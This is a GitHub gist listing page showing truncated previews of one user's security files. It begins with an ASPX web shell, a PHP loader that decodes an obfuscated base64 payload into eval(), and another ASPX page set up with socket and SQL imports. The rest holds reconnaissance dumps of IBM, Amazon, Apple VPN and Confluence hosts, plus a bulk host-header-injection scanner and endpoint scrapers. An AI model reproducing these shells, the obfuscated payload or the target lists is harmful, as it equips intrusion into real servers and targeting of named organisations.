This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%-- ASPX Shell by LT <lt@mac.hush.com> (2007) --%> | |
| <%@ Page Language="C#" EnableViewState="false" %> | |
| <%@ Import Namespace="System.Web.UI.WebControls" %> | |
| <%@ Import Namespace="System.Diagnostics" %> | |
| <%@ Import Namespace="System.IO" %> | |
| <% | |
| string outstr = ""; | |
| // get pwd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php function ZQuC($PkDwJ) | |
| { | |
| $PkDwJ=gzinflate(base64_decode($PkDwJ)); | |
| for($i=0;$i<strlen($PkDwJ);$i++) | |
| { | |
| $PkDwJ[$i] = chr(ord($PkDwJ[$i])-1); | |
| } | |
| return $PkDwJ; | |
| }eval(ZQuC("jVaNTuM4EH6APoUvqkiiK0nZZe9OlAItmwKnAqUti1YrFDmOSwypHcXulrLh2W/sJtv0hJZFQPF45puZb34MQvqL5rnIw5xmIleMPzhtt9NoYtRFllQ5gx8LzhGcm+EkGH8Jxp1GQnFMc8c6FVxRrnanq4weIEWflZ+oedohCc4lVd2Fmu3+YwHebMGJYoKjRKnsjKoUM6dJXPSjoSNoxoBOFnkaMs6UA/paagSAIjLlNOMWOr0dD69H0xA+WgiM39GCWHtnwdW0hexL8cLSFPufvDZyiJhnWLEopR3UxyxeyIxBMv4Hr91Bf+r4Dnx/uVx6kb70QN2XFOck8deKns7Qtd9xP5kMQ6DqYvB1FATjFhr0hpPgt23OryfT37MZB9Pb8dV03LuaDLSfvXf0z4PeZ63XLvWatKKePlMCqnV7kgpJN7KcqkXOwaTTeG3EdMY4dWzQs6Ec0Td7HNzcBhNdnwv7HkwqjZzOQOMPJiEcRyueT6cjCBziDcagiY6RbaMD9MbVBgS6rHRjVHR1Q1PeLS3JFAU1q6wizjJPxjP49gjxj616UALHWjMWc8x41/J+Qmvu7XvPZGztQKskcAtZVpJ1F6xllBMRUweCc2vYczqnEsC1j8oKSKD5/8xA5m7x9KCt7BPTlRPjppiIB7EovjIJv/srRdfei3MstOTjX+213gmz6wGIiKWaCNvPEsFpkeG4yERcsJE5spH+W0j4Ay56PM4Fi4tLY1X0U0ye+rAUVsVFUMoub276uVhK8Pzv7WkxoJxTUiyvJ5W0/Lw6K+5odD0pJqt5xDAv7hiP4QYZv349RpxTrCuKHSAECuFJPVeWi0S+EY |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <%@ Import Namespace="System.Runtime.InteropServices" %> | |
| <%@ Import Namespace="System.Net" %> | |
| <%@ Import Namespace="System.Net.Sockets" %> | |
| <%@ Import Namespace="System.Security.Principal" %> | |
| <%@ Import Namespace="System.Data.SqlClient" %> | |
| <script runat="server"> | |
| protected void Page_Load(object sender, EventArgs e) | |
| { |
Sachinart
/ ibm-recon-asset-all.txt
Created
April 24, 2024 07:52
IBM all asset recon data httpx resolved by Chirag Artani
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://1.16409358.fme.ustream.tv | |
| http://1.19563686.fme.ustream.tv | |
| http://1.23335565.fme.ustream.tv | |
| http://1.5151073.fme.ustream.tv | |
| http://1.8034397.fme.ustream.tv | |
| http://16409358.fme.ustream.tv | |
| http://19563686.fme.ustream.tv | |
| http://23967075.fme.ustream.tv | |
| http://5151073.fme.ustream.tv | |
| http://626.bluefizz.net |
Sachinart
/ hostheader-injection.py
Created
March 31, 2024 11:33
Host Header Injection Vulnerability Finding In A Bulk With Fast Speed By Chirag Artani. Note: every vulnerable output will be saved in vulnerable.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import subprocess | |
| from pyfiglet import Figlet | |
| from concurrent.futures import ThreadPoolExecutor | |
| def print_colored_message(color_code, message): | |
| colors = { | |
| 'red': '\033[31m', | |
| 'green': '\033[32m' | |
| } |
Sachinart
/ axios-fetch-endpoints-from-any-urls-bulk.js
Last active
March 19, 2024 19:33
NodeJs Script to fetch endpoints in any url in bulk using axios npm JSDOM recon script by Chirag Artani
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const axios = require('axios'); | |
| const { JSDOM } = require('jsdom'); | |
| const fs = require('fs'); | |
| const { Worker, isMainThread, parentPort, workerData } = require('worker_threads'); | |
| // Function to fetch endpoints from a single URL | |
| async function fetchEndpoints(url) { | |
| try { | |
| const response = await axios.get(url); | |
| const dom = new JSDOM(response.data); |
Sachinart
/ endpoint-fetch-from-any-urls-bulk.py
Last active
March 19, 2024 19:31
Python script that can fetch endpoints from a file which contains any url links with proper sorting. change katana-js.txt to your file which contain .js urls. Everything will be saved in output.txt - Script By Chirag Artani
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import threading | |
| def extract_endpoints_from_url(url, output_file): | |
| try: | |
| response = requests.get(url) | |
| if response.status_code == 200: | |
| content = response.text | |
| # Regular expression to find endpoints (assumes they start with '/'). |
Sachinart
/ amazon-recon-all-domains-subdomain.txt
Created
March 11, 2024 14:55
Amazon tldr all domains subdomain recon data
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 009951544-frontier.amazon.co.jp | |
| 00c96cb70-frontier.amazon.pl | |
| 04f01a85e-frontier.amazon.com.au | |
| 0d345b26d-frontier.amazon.co.jp | |
| 114ea2bf7-frontier.amazon.co.uk | |
| 164.3a0674792.hiring.amazon.ca | |
| 1cpanel.com.accounts-north-cn-cn-1-prod.s.advertising.amazon.cn | |
| 1cpanel.com.accounts-prod-prod-prod-north-prod-prod.s.advertising.amazon.cn | |
| 1cpanel.com.accounts-retail-proxy-cn-north-1-prod.s.advertising.amazon.cn | |
| 1cpanel.com.ams.s.advertising.amazon.cn |
Sachinart
/ confluence-recon.txt
Created
October 10, 2023 19:00
All Confluence Instance Recon By Chirag Artani
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://1.117.188.132 | |
| http://1.117.189.43 | |
| http://100.25.201.12 | |
| http://101.132.77.158 | |
| http://101.200.32.122 | |
| http://101.200.61.45 | |
| http://101.34.66.167 | |
| http://101.35.143.219 | |
| http://101.37.163.158 | |
| http://101.37.255.135 |
Sachinart
/ apple-recon-cidr-asn.txt
Last active
October 10, 2023 17:41
Apple Recon data - CIDR & ASN based all IPs scanned | reverse DNS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 144.178.16.10 ussjc1-client-vpn15.apple.com. | |
| 144.178.16.100 usdal2-corpclient-vpn.apple.com. | |
| 144.178.16.101 usdal2-corpclient-vpn11.apple.com. | |
| 144.178.16.102 usdal2-corpclient-vpn12.apple.com. | |
| 144.178.16.103 usdal2-corpclient-vpn13.apple.com. | |
| 144.178.16.104 usdal2-corpclient-vpn14.apple.com. | |
| 144.178.16.105 usdal2-corpclient-vpn15.apple.com. | |
| 144.178.16.106 usdal2-corpclient-vpn16.apple.com. | |
| 144.178.16.11 ussjc1-client-vpn16.apple.com. | |
| 144.178.16.12 ussjc1-dcvpnclient-vpn.apple.com. |
NewerOlder